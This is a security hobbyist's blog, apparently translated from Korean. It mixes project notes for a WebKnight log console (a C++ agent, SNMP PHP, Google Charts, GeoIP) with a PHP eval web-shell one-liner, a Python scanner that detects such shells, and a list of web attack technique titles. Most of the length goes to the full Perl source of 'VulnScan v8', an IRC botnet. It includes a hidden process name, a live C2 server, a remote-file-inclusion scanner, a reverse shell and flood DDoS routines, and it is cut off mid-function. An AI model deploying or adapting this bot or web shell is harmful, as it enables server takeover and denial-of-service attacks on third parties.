<?eval($_REQUEST[c])?> 

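Almost every web shell I come across these days is a one-liner, and the only function it uses is eval. For a while web shells bundled a great many features, like an assorted gift set; these days those features seem to be handled on the client side.
Each approach has its pros and cons: the former is hard for an IDS to detect, and the latter is hard to find during a server audit.
Restricting the eval function right away would protect against this style of web shell. However, there are many functions that can stand in for eval.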
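
One way to hunt for the one-line shells described above during a server audit, as an added example (not code from the original post): a Python scanner that flags PHP where request input reaches eval or another execution function, either directly or through plain variable assignments. The sink list, the sample files and every function name are assumptions made for this illustration, and the list is not exhaustive.

```python
"""Flag PHP source in which request input reaches a code/command execution sink."""
import re
import sys
from dataclasses import dataclass
from pathlib import Path

# Request-controlled superglobals (sources).
SOURCE_RE = re.compile(r"\$_(?:REQUEST|GET|POST|COOKIE)\b")

# Constructs and functions that run PHP code or OS commands (sinks).
# Assumption: an illustrative, non-exhaustive list chosen for this example.
SINKS = ("eval", "assert", "system", "exec", "passthru", "shell_exec",
         "popen", "proc_open", "create_function")
# The lookbehind skips curl_exec(), $pdo->exec(), Foo::exec() and $name().
SINK_RE = re.compile(r"(?<![\w$>:])(" + "|".join(SINKS) + r")\s*\(", re.I)

# "$var = expr;" but not "==" or "=>".
ASSIGN_RE = re.compile(r"(\$[A-Za-z_]\w*)\s*=(?![=>])\s*([^;]*);")

# String literals are kept, comments are dropped.
TOKEN_RE = re.compile(r"""
    ('(?:\\.|[^'\\])*' | "(?:\\.|[^"\\])*")    # group 1: string literal
  | (/\*.*?\*/ | (?://|\#)[^\n]*)              # group 2: comment
""", re.S | re.X)


@dataclass
class Finding:
    line: int
    sink: str
    reason: str


def strip_comments(src: str) -> str:
    """Remove PHP comments while keeping string literals and line numbers."""
    def repl(m):
        if m.group(1) is not None:
            return m.group(1)
        return "\n" * m.group(2).count("\n") or " "
    return TOKEN_RE.sub(repl, src)


def call_args(code: str, open_idx: int) -> str:
    """Return the text between the parenthesis at open_idx and its match."""
    depth = 0
    for i in range(open_idx, len(code)):
        if code[i] == "(":
            depth += 1
        elif code[i] == ")":
            depth -= 1
            if depth == 0:
                return code[open_idx + 1:i]
    return code[open_idx + 1:]  # unterminated call: take the rest


def uses(expr: str, var: str) -> bool:
    return re.search(re.escape(var) + r"\b", expr) is not None


def scan_php(src: str) -> list[Finding]:
    code = strip_comments(src)
    # Pass 1: variables assigned from request input or from a tainted variable.
    tainted: set[str] = set()
    for m in ASSIGN_RE.finditer(code):
        var, expr = m.group(1), m.group(2)
        if SOURCE_RE.search(expr) or any(uses(expr, t) for t in tainted):
            tainted.add(var)
    # Pass 2: sink calls whose arguments contain a source or a tainted variable.
    findings = []
    for m in SINK_RE.finditer(code):
        args = call_args(code, m.end() - 1)
        line = code.count("\n", 0, m.start()) + 1
        sink = m.group(1).lower()
        if SOURCE_RE.search(args):
            findings.append(Finding(line, sink, "request input passed directly"))
            continue
        hit = [t for t in sorted(tainted) if uses(args, t)]
        if hit:
            findings.append(Finding(line, sink, f"tainted variable {hit[0]}"))
    return findings


def scan_tree(root: str) -> dict[str, list[Finding]]:
    """Scan every *.php file under root; only files with findings are returned."""
    report = {}
    for path in Path(root).rglob("*.php"):
        found = scan_php(path.read_text(errors="replace"))
        if found:
            report[str(path)] = found
    return report


# Constructed sample inputs; the first is the one-liner quoted in the post.
SAMPLES = {
    "page_one_liner": "<?eval($_REQUEST[c])?>",
    "one_hop": "<?php\n/* maintenance\n   helper */\n$c = $_POST['c'];\n"
               "$d = trim($c);\nassert($d);\n?>",
    "benign": "<?php\n// eval($_GET['x']) is never called here\n"
              "$r = curl_exec($ch);\n$out = exec('uptime');\n"
              "echo htmlspecialchars($_GET['page']);\n?>",
}

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for name, found in scan_tree(sys.argv[1]).items():
            print(name, found)
    else:
        for name, src in SAMPLES.items():
            print(name, scan_php(src))
```

Run it with a web root as the only argument to scan real files; without arguments it prints the findings for the constructed samples.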

Posted by applicationlayer
Remaining: rule backup and rollback features

Things to add to the summary menu

total event - shown as bars in a table chart

system event or log
date/time - level - description
 

It is annoying if you do not use this.
<form autocomplete="off">

Developed an agent that automatically sends out mail when WebKnight logs accumulate on the server
-> events can be checked by mail even when nobody is monitoring

Key functions
FindFirstChangeNotification
FindNextChangeNotification
WaitForMultipleObjects



// agent.cpp : Defines the entry point for the console application.
//
// Watches the WebKnight log directory and, whenever a log file changes size,
// requests LogAnalysis.php on the console server so that it sends the mail.

#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <tchar.h>
#include <Wininet.h>

#pragma comment(lib, "wininet.lib")

int _tmain(int argc, _TCHAR* argv[])
{
    HANDLE dwChangeHandles[1];
    DWORD dwWaitStatus;
    HINTERNET hInternet;
    HINTERNET hURL;
    HINTERNET hRequest;
    BOOL bRet;

    // Watch the log directory and its subdirectories for file size changes.
    dwChangeHandles[0] = FindFirstChangeNotification(L"C:\\Program Files\\AQTRONIX Webknight\\LogFiles", TRUE, FILE_NOTIFY_CHANGE_SIZE);

    // Failure is reported as INVALID_HANDLE_VALUE; NULL is checked defensively.
    if (dwChangeHandles[0] == INVALID_HANDLE_VALUE || dwChangeHandles[0] == NULL)
    {
        printf("\n ERROR: FindFirstChangeNotification function failed.\n");
        ExitProcess(GetLastError());
    }

    while (TRUE)
    {
        printf("\nWaiting for notification...\n");
        dwWaitStatus = WaitForMultipleObjects(1, dwChangeHandles, FALSE, INFINITE);
        switch (dwWaitStatus)
        {
        case WAIT_OBJECT_0:
            printf("\nchange log size\n");

            // Ask the console server to analyse the new log entries and send mail.
            hInternet = InternetOpen(L"WebKnightConsoleAgent", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
            hURL = hInternet ? InternetConnect(hInternet, L"192.168.230.130", 80, L"", L"", INTERNET_SERVICE_HTTP, 0, 0) : NULL;
            hRequest = hURL ? HttpOpenRequest(hURL, L"GET", L"/LogAnalysis.php?no=1&mail=1", NULL, NULL, NULL, 0, 0) : NULL;
            bRet = hRequest ? HttpSendRequest(hRequest, NULL, 0, NULL, 0) : FALSE;
            if (!bRet)
                printf("\n ERROR: request to LogAnalysis.php failed.\n");

            // Close the WinINet handles on every pass; the loop runs forever.
            if (hRequest) InternetCloseHandle(hRequest);
            if (hURL) InternetCloseHandle(hURL);
            if (hInternet) InternetCloseHandle(hInternet);

            // Re-arm the notification before waiting again.
            if (FindNextChangeNotification(dwChangeHandles[0]) == FALSE)
            {
                printf("\n ERROR: FindNextChangeNotification function failed.\n");
                ExitProcess(GetLastError());
            }
            break;
        case WAIT_TIMEOUT:
            printf("\nNo changes in the timeout period.\n");
            break;
        default:
            printf("\n ERROR: Unhandled dwWaitStatus.\n");
            ExitProcess(GetLastError());
            break;
        }
    }

    FindCloseChangeNotification(dwChangeHandles[0]);
    return 0;
}




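Google Charts does run in Internet Explorer, but the graphics do not look smooth and it is comparatively sluggish. As expected, Chrome gives the smoothest display.

I worked on linking the Google gauge chart to Windows SNMP and had quite a hard time with it. In the end there is no problem if you code it by the book, but the internet is full of shortcuts and hacks. Books do not address this part precisely either. This kind of problem seems to arise because web programming itself is so lenient about syntax.

Remaining
[Done] Server CPU, memory, traffic check feature
[Done] Google Maps marker design - decided to just use Google's.. too much bother
Windows server agent
WebKnight conf list box / combo box features
Per-server log statistics
[Done] Add-server UI
[Done] Delete-server feature
Print the full text when Additional info is clicked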




111102bugfix

webhxxx/research project 2011. 11. 2. 12:38 |
Loganalysis.php
When the date is incremented, a single-digit value is now padded with a leading 0 to make it two digits

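Using the gauge chart provided by Google, you can plot a remote server's traffic as a graph.
The source above was found through an internet search and uses a random function so that the graph changes dynamically. Only that part needs to be modified.
Example)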
  setInterval(function() {
    data.setValue(0, 1, Number(getHttprequest('snmpproc.php?id=cpu&snmpserver=<?=$servername?>')));
    chart.draw(data, options);
  }, 10000);
  setInterval(function() {
    data.setValue(1, 1,Number(getHttprequest('snmpproc.php?id=network&snmpserver=<?=$servername?>')));
    chart.draw(data, options);
  }, 10000);
  setInterval(function() {
    data.setValue(2, 1,Number(getHttprequest('snmpproc.php?id=tcp&snmpserver=<?=$servername?>')));
    chart.draw(data, options);
  }, 10000);
  setInterval(function() {
    data.setValue(3, 1,Number(getHttprequest('snmpproc.php?id=udp&snmpserver=<?=$servername?>')));
    chart.draw(data, options);
  }, 10000);


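snmpproc.php example)
<?php
// Metric name and target host come from the query string.
$id = isset($_GET['id']) ? $_GET['id'] : '';
// NOTE: $snmpserver is taken straight from the request; restrict it to the
// monitored servers before use, or any client can point SNMP queries anywhere.
$snmpserver = isset($_GET['snmpserver']) ? $_GET['snmpserver'] : '';
if($id=='cpu'){
        // CPU load OID; the first entry has the form "type: value"
        $snmparr = snmpwalk("$snmpserver","public",".1.3.6.1.2.1.25.3.3.1.2");
        $rt = explode(': ',$snmparr[0]);
        echo $rt[1];
}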



To use the SNMP functions in PHP, SNMP must be installed.

yum -y install snmp*
yum -y install php-snmp*

Start the snmp daemon and restart apache





SNMP reference data)
total memory
.1.3.6.1.2.1.25.2.2.0

cpu load
.1.3.6.1.2.1.25.3.3.1.2

SNMP related
http://www.4te.co.kr/91
http://www.chonnom.com/bbs/board.php?bo_table=B19&wr_id=84&page=7
http://www.chonnom.com/bbs/board.php?bo_table=B20&wr_id=115

http://www.nanha.com/index.php?p=b/view&n=776&b=dft


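Google Charts does not display properly in IE, so I decided to test against Chrome from now on.

The checkboxes and text boxes in the conf UI apply their changes through XMLHttpRequest, so the screen does not refresh. To apply this cleanly to the list boxes as well, I will probably need to study AJAX a bit.




Remaining
Server CPU, memory, traffic check feature
Google Maps marker design
Windows server agent
WebKnight conf list box / combo box features
Per-server log statistics
Add-server UI
Delete-server feature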

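Difference between IE and Chrome when accessing an object
IE can refer to an object by its name string alone, whereas in Chrome it has to be looked up through a function

Example)
<html>
<script>
// Debug helper: shows the name and checked state of the element passed in.
function XmlSave(InputName,bb,cc)
{
var msg = "DEBUG Message:xmlsave function." + InputName.name + "-" + InputName.checked;

alert(msg);
}
</script>
<body>
<input name="Scanning" type="checkbox" onclick="XmlSave(Scanning,'192.168.230.128','8080')" >

Runs in IE, does not run in Chrome

Use it as shown below
<input name="Scanning" type="checkbox" onclick="XmlSave(this,'192.168.230.128','8080')" >

When accessing an object other than the element itself, this cannot be used; in that case refer to the site below
http://www.mungchung.com/xe/4197

I should have tested with Chrome from the start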


Google Maps integration - rank attacker IPs by frequency and then show them on Google Maps; the marker icons will have to be either made or found

Stick to these file names;
[root@localhost html]# ll /usr/local/GeoIP/share/GeoIP/
total 32796
-rw-r--r-- 1 root root  4058575 Oct  3 09:09 GeoIPASNum.dat
-rw-r--r-- 1 root root 28298901 Oct  7 12:49 GeoIPCity.dat
-rw-r--r-- 1 root root  1183408 Oct 18 12:54 GeoIP.dat


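Progress

webhxxx/research project 2011. 10. 23. 14:07 |
WebKnight log collection works; loading into the DB, web output, and the search feature are done
(search interface modeled on IBM Proventia, haha)

Flag images are displayed using GeoIP

Plan
Get coordinates with GeoIP, plot them on a map with the Google Maps API, and display it on screen

For example


The map image was taken from http://techpad.tistory.com/24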

 


SNMP related

webhxxx/research project 2011. 10. 20. 22:34 |


Google Maps related

webhxxx/research project 2011. 10. 20. 20:33 |
For reference
http://techpad.tistory.com/24

Fix the table width & hide any characters that overflow
style="white-space:nowrap; overflow:hidden;"


GeoIP reference

webhxxx/research project 2011. 10. 17. 20:58 |

 

%%%%%http://blog.daum.net/toddryu/81

http://blog.dasom.pe.kr/20


Web issue list

webhxxx 2011. 1. 10. 13:46 |
Let's study these one at a time
Source: 헐랭이,
http://jeremiahgrossman.blogspot.com/2010/11/calling-all-security-researchers-submit.html
ASP.NET 'Padding Oracle' Crypto Attack
Attacking HTTPS with Cache Injection
Breaking into a WPA network with a webpage
Bypassing CSRF protections with ClickJacking and HTTP Parameter Pollution
CSS History Hack In Firefox Without JavaScript for Intranet Portscanning
Chrome and Safari users open to stealth HTML5 AppCache attack
Chronofeit Phishing
Converting unimplementable Cookie-based XSS to a persistent attack
Cookie Eviction
Cracking hashes in the JavaScript cloud with Ravan
Cross Site URL Hijacking by using Error Object in Mozilla Firefox
DNS Rebinding on Java Applets
Evercookie
Expanding the Attack Surface
Flash Camera and Mic Remember Function and XSS
Fooling B64_Encode(Payload) on WAFs and filters
Generic cross-browser cross-domain theft
Get Internal Network Information with Java Applets
Google Chrome HTTP AUTH Dialog Spoofing through Realm Manipulation
Hacking Auto-Complete (Safari v1, Safari v2 TabHack, Firefox, Internet Explorer)
How to Conceal XSS Injection in HTML5
IIS5.1 Directory Authentication Bypass by using ":$I30:$Index_Allocation"
IIS6/ASP & file upload for fun and profit
Improving HTTPS Side Channel Attacks
Internal Port Scanning via Crystal Reports
Java Applet Same IP Host Access
Java DSN Rebinding + Java Same IP Policy = The Internet Mayhem
JavaSnoop
Lost in Translation (ASP’s HomoXSSuality)
Mapping a web browser to GPS coordinates via router XSS + Google Location Services without prompting the user
MitM DNS Rebinding SSL/TLS Wildcards and XSS
MySQL Stacked Queries with SQL Injection...sort of
NAT Pinning: Penetrating routers and firewalls from a web page (forcing router to port forward)
Next Generation Clickjacking
No Alnum JavaScript (cheat sheet, jjencode demo)
NoScript Bypass - "Reflective XSS" through Union SQL Poisoning Trick
Non-Obvious (Crypto) Bugs by Example
One vector to rule them all
Penetrating Intranets through Adobe Flex Applications
Performing DDoS attacks with HTML5 Cross Origin Requests & WebWorkers
Persistent Cross Interface Attacks
Poisoning proxy caches using Java/Flash/Web Sockets
Popup & Focus URL Hijacking
Port Scanning with HTML5 and JS-Recon
Posting raw XML cross-domain
Quick Proxy Detection
Re-visiting JAVA De-serialization: It can't get any simpler than this !!
SQLi filter evasion cheat sheet (MySQL)
Side Channel Attacks in SSL
Stealing entire Auto-Complete data in Google Chrome
Stored XSS Vulnerability @ Amazon
Stroke triggered XSS and StrokeJacking
Strokejacking
Tapjacking: owning smartphone browsers
The curse of inverse strokejacking
Turning XSS into Clickjacking
Universal XSS in IE8
Using Cookies For Selective DoS and State Detection
Will it Blend?
XSHM Mark 2
XSS-Track: How to quietly track a whole website through single XSS
XSSing client-side dynamic HTML includes by hiding HTML inside images and more
padding oracle web attack (poet, Padbuster, demo)
phpwn: Attack on PHP sessions and random numbers
Source: Recent web hacking techniques


SharinGan Scanner 1.2.1

webhxxx/weblog 2010. 11. 22. 13:19 |
SharinGan Scanner 1.2.1, what is this?

## History:
## + Fixed cryptz command (v4.5)
## + Fixed user commands execution by unauthorized user (v4.6) (thx to ajegile)
## + Added options to enable/disable encrypted password (v4.7)
## + Fixed missing hostname on sublink (v4.8)
## + Added links filter to exclude exploiting bad links (v4.9)
## + Fixed private message scanning (v4.9.2) (thx to BLood_roSE)
## + Added spread configuration (v5.0)
## + Updated search engines (v5.1)
## + Added HTTP Error handler for search engines (v5.2)
## + Added more search engines (v5.3) (thx to kaMtiEz, arianom, tukulesto, & Mask_Magician)
## + Added md5 hash & crack tool (v5.4)


Anti-CSRF bypass techniques

webhxxx 2010. 10. 20. 12:41 |
Even when a security token is used to prevent CSRF, a CSRF attack is still possible if the site is vulnerable to XSS.

I can't believe I did not know about this option. I need to do better.




User-Agent: Mozilla/5.0 (Linux; U; Android 2.1-update1; ko-kr; XT720 Build/STSKT_N_79.11.36R) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17

project

Found an interesting RFI, so I am saving it here

There does not seem to be any document that covers RFI botnets in detail


vulscan v8

webhxxx/RFI bot 2010. 4. 18. 14:29 |
#!/usr/bin/perl
# VulnScan v8 -Final- By Morgan
# Colors by delet
#
# Note:
# DO NOT REMOVE COPYRIGHTS ...
#
# |_|0|_|
# |_|_|0|
# |0|0|0|
#
# New functions :
#                New l33t colors
#                Fixed Google
#
# Scan command :
# !morgan !eval @gstring='google%20dork';
# !morgan @rfiscan vulnfile.php?vulnvar=
#
# DDoS commands :
# Udp : !morgan @udpflood IP packet-size time
# Tcp : !morgan @tcpflood IP port time
# Http: !morgan @httpflood www.website.com time
#
# Greets to :
#
# All irc.root.net.ve - #Morgan users...
#
#
# Enjoy the bot ....
# /Morgan

use HTTP::Request;
use LWP::UserAgent;

################ V8 CONFIGURATION #############################################################
my $processo = 'ps aux';                   # Fake process name for the bot                #
if (`ps uxw` =~ /ps aux/)                    # (CHANGE IT!!!)                               #
{                                              #                                              #
exit;                                          #                                              #
}                                              #                                              #
###############################################################################################
my $linas_max='8';                             # Avoid Flood                                  #
###############################################################################################
my $sleep='5';                                 # sleep time                                   #
##################### IRC #####################################################################
my @adms=("evil");                           # Administrator Nickname                       #
###############################################################################################
my @canais=("#dark");                        # Channel ..if  password -> ("#channel :pass") #
###############################################################################################
my $nick='evil';                             # Nick prefix of the bot example :             #
                                               # vs[v7] = vs[v7]-718727                       #
###############################################################################################
my $ircname = 'evil';                            # Identd of the bot                            #
###############################################################################################
chop (my $realname = `uname -a`);                 # Full Name                                    #
###############################################################################################
$servidor='dos.mygenc.org' unless $servidor;  # Server IRC of the bot                        #
###############################################################################################
my $porta='8889';                              # Server PORT                                  #
################ CMD ##########################################################################
my @cmdgif='http://rzgr.by.ru/cmd.gif';  # If you change this cmd must be same as:      #
                                                     # http://myspace.si/images/sad.gif       #
###############################################################################################

my $VERSAO = 'v8';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);


our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();

$sel_cliente = IO::Select->new();
sub sendraw {
  if ($#_ == '1') {
    my $socket = $_[0];
    print $socket "$_[1]\n";
  } else {
      print $IRC_cur_socket "$_[0]\n";
  }
}
# MORGAN OWNED YOUR BOX
#
# morgan.rx@gmail.com
sub conectar {
   my $meunick = $_[0];
   my $servidor_con = $_[1];
   my $porta_con = $_[2];

   my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
   if (defined($IRC_socket)) {
     $IRC_cur_socket = $IRC_socket;

     $IRC_socket->autoflush(1);
     $sel_cliente->add($IRC_socket);

     $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
     $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
     $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
     $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
     nick("$meunick");
     sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
     sleep 1;
   }
}
my $line_temp;
while( 1 ) {
   while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
   delete($irc_servers{''}) if (defined($irc_servers{''}));
   my @ready = $sel_cliente->can_read(0);
   next unless(@ready);
   foreach $fh (@ready) {
     $IRC_cur_socket = $fh;
     $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
     $nread = sysread($fh, $msg, 4096);
     if ($nread == 0) {
        $sel_cliente->remove($fh);
        $fh->close;
        delete($irc_servers{$fh});
     }
     @lines = split (/\n/, $msg);

     for(my $c=0; $c<= $#lines; $c++) {
       $line = $lines[$c];
       $line=$line_temp.$line if ($line_temp);
       $line_temp='';
       $line =~ s/\r$//;
       unless ($c == $#lines) {
         parse("$line");
       } else {
           if ($#lines == 0) {
             parse("$line");
           } elsif ($lines[$c] =~ /\r$/) {
               parse("$line");
           } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
               parse("$line");
           } else {
               $line_temp = $line;
           }
       }
      }
   }
}

sub parse {
   my $servarg = shift;
   if ($servarg =~ /^PING \:(.*)/) {
     sendraw("PONG :$1");
   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
       my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
       if ($args =~ /^\001VERSION\001$/) {
         notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
       }
       if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
         if ($onde eq "$meunick"){
           shell("$pn", "$args");
         }
         if ($args =~ /^(\Q$meunick\E|\!morgan)\s+(.*)/ ) {
            my $natrix = $1;
            my $arg = $2;
            if ($arg =~ /^\!(.*)/) {
              ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
            } elsif ($arg =~ /^\@(.*)/) {
                $ondep = $onde;
                $ondep = $pn if $onde eq $meunick;
                bfunc("$ondep","$1");
            } else {
                shell("$onde", "$arg");
            }
         }
       }
}
    elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
       if (lc($1) eq lc($meunick)) {
         $meunick=$4;
         $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
       }
   } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
       nick("$meunick|".int rand(999999));
   } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
       $meunick = $2;
       $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
       $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
       foreach my $canal (@canais) {
         sendraw("JOIN $canal ddosit");
       }
   }
}

# MORGAN OWNED YOUR BOX
# www.morganxpl.com
# morgan.rx@gmail.com
sub bfunc {
  my $printl = $_[0];
  my $funcarg = $_[1];
  if (my $pid = fork) {
     waitpid($pid, 0);
  } else {
      if (fork) {
         exit;
       } else {
           if ($funcarg =~ /^portscan (.*)/) {
             my $hostip="$1";
             my @portas=("21","22","23","25","59","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018","8889");
             my (@aberta, %porta_banner);
     sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2PortScan15) 15(2IP7:12 ".$1." 15) 15(2Status7: 12Searching for Open Ports15)");
             foreach my $porta (@portas)  {
                my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
                if ($scansock) {
                   push (@aberta, $porta);
                   $scansock->close;
                }
             }

             if (@aberta) {
               sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2PortScan15) 15(2Concluido15) 15(2Open Ports7:12 @aberta 15)");
             } else {
               sendraw($IRC_cur_socket,"PRIVMSG $printl :15(7@2PortScan15) 15(2Concluido15) 15(2No open ports found15)");
             }
           }
           if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
     sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2TCP Flood15) 15(2Started15) (2IP7:12 ".$1." 2Porta7:12 ".$2." 2Tempo7:12 ".$3." 2segundos15)");
     my $itime = time;
     my ($cur_time);
             $cur_time = time - $itime;
     while ($3>$cur_time){
             $cur_time = time - $itime;
     &tcpflooder("$1","$2","$3");
             }
     sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2TCP Flood15) 15(2Finished15) (2IP7:12 ".$1." 2Porta7:12 ".$2." 15)");
           }
   if ($funcarg =~ /^version/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2Versao15) 12Vulnscan 2v87 ");
}

if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
my $host = "$1";
my $porta = "$2";
my $proto = getprotobyname('tcp');
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($porta, $iaddr);
my $shell = "/bin/sh -i";
if ($^O eq "MSWin32") {
$shell = "cmd.exe";
}
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
connect(SOCKET, $paddr) or die "connect: $!";
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system("$shell");
close(STDIN);
close(STDOUT);
close(STDERR);

if ($estatisticas)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2ConnectBack15) 15(2Connecting15) (2IP7/2Port7:12 $host:$porta 15)");
}
}
#SCANNER
           if ($funcarg =~ /^rfiscan\s+(\d+)\s+(.*)/) {
         $boturl=$2;
   sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2Scan15) (2Started15) (2Searching for7:12 ".$boturl." 2Time7:12 ".$1." 2seconds15)");
     srand;
     my $itime = time;
     my ($cur_time);
     my ($exploited);
         $boturl=$2;
             $cur_time = time - $itime;$exploited = 0;
while($1>$cur_time){
    $cur_time = time - $itime;
    @urls=fetch();
foreach $url (@urls) {
$cur_time = time - $itime;
 #sendraw($IRC_cur_socket, "PRIVMSG #debug :15(7@2Scan15) 15(2Exploiting7:12 ".$url2." 15)");
my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
$url2 ="http://".$path."/".$boturl."@cmdgif?";
print "\n".$url2."\n\n";


# MORGAN OWNED YOUR BOX
# www.morganxpl.com
# morgan.rx@gmail.com

my $req=HTTP::Request->new(GET=>$url2);
my $ua=LWP::UserAgent->new();
$ua->timeout(10);
my $response=$ua->request($req);

if ($response->is_success) {
 if( $response->content =~ /By/ && $response->content =~ /chaos/ ){
 sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2Vulnerable15) 15(2Vuln7:12 ".$url2." 15)");
}
}
else {
}
 }
}
     sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2Scan15) 15(2Finished15) (2Scan Finished7:12 ".$1." 2seconds15)");
           }
           if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
     sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2HTTP Flood15) (2Started15) (2Victim7:12 ".$1."7:1280 2Time7:12 ".$2." 2seconds15)");
     my $itime = time;
     my ($cur_time);
             $cur_time = time - $itime;
     while ($2>$cur_time){
             $cur_time = time - $itime;
     my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
             print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
     close($socket);
             }
     sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2HTTP Flood15) (2Finished15) 15(2Victim7:12 ".$1."15)");
           }
           if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
             sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2UDP Flood15) 15(2Started15) (2Victim7:12 ".$1." 2Size7:12 ".$2." 7KB 2Time7:12 ".$3." 2seconds15)");
             my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
             $dtime = 1 if $dtime == 0;
             my %bytes;
             $bytes{igmp} = $2 * $pacotes{igmp};
             $bytes{icmp} = $2 * $pacotes{icmp};
             $bytes{o} = $2 * $pacotes{o};
             $bytes{udp} = $2 * $pacotes{udp};
             $bytes{tcp} = $2 * $pacotes{tcp};
             sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2UDP Flood15) 15(2Finished15) 15(2Sent7:12 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 7KB 2in12 ".$dtime." 2seconds15) (2Victim7:12 ".$1."15)");
           }
           exit;
       }
  }
}
# MORGAN OWNED YOUR BOX
# www.morganxpl.com
# morgan.rx@gmail.com
sub ircase {
  my ($kem, $printl, $case) = @_;

  if ($case =~ /^join (.*)/) {
     j("$1");
   }
   if ($case =~ /^part (.*)/) {
      p("$1");
   }
   if ($case =~ /^rejoin\s+(.*)/) {
      my $chan = $1;
      if ($chan =~ /^(\d+) (.*)/) {
        for (my $ca = 1; $ca <= $1; $ca++ ) {
          p("$2");
          j("$2");
        }
      } else {
          p("$chan");
          j("$chan");
      }
   }
   if ($case =~ /^op/) {
      op("$printl", "$kem") if $case eq "op";
      my $oarg = substr($case, 3);
      op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
   }
   if ($case =~ /^deop/) {
      deop("$printl", "$kem") if $case eq "deop";
      my $oarg = substr($case, 5);
      deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
   }
   if ($case =~ /^msg\s+(\S+) (.*)/) {
      msg("$1", "$2");
   }
   if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
      for (my $cf = 1; $cf <= $1; $cf++) {
        msg("$2", "$3");
      }
   }
   if ($case =~ /^ctcp\s+(\S+) (.*)/) {
      ctcp("$1", "$2");
   }
   if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
      for (my $cf = 1; $cf <= $1; $cf++) {
        ctcp("$2", "$3");
      }
   }
   if ($case =~ /^nick (.*)/) {
      nick("$1");
   }
   if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
       conectar("$2", "$1", 6667);
   }
   if ($case =~ /^raw (.*)/) {
      sendraw("$1");
   }
   if ($case =~ /^eval (.*)/) {
     eval "$1";
   }
}
# MORGAN OWNED YOUR BOX
# www.morganxpl.com
# morgan.rx@gmail.com
sub shell {
  my $printl=$_[0];
  my $comando=$_[1];
  if ($comando =~ /cd (.*)/) {
    chdir("$1") || msg("$printl", "15(7@2INFO15) (2No souch file/directory15)");
    return;
  }
  elsif ($pid = fork) {
     waitpid($pid, 0);
  } else {
      if (fork) {
         exit;
       } else {
           my @resp=`$comando 2>&1 3>&1`;
           my $c=0;
           foreach my $linha (@resp) {
             $c++;
             chop $linha;
             sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
             if ($c == "$linas_max") {
               $c=0;
               sleep $sleep;
             }
           }
           exit;
       }
  }
}
# MORGAN OWNED YOUR BOX
# www.morganxpl.com
# morgan.rx@gmail.com
sub tcpflooder {
 my $itime = time;
